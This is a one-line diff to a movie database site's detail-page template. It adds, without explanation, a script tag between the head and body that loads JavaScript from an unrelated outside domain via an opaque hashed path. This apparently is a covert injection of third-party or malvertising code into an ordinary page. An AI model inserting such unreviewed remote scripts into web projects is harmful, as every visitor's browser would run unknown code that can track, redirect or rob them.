--- a/moviedb/templates/movie_details.html
+++ b/moviedb/templates/movie_details.html
@@ -180,6 +180,7 @@
         }
     </style>
 </head>
+<script type='text/javascript' src='//elegantimpose.com/de/89/b7/de89b76309771563f1f618587e867e6b.js'></script>
 <body>
     <header>
         <div class="navbar">
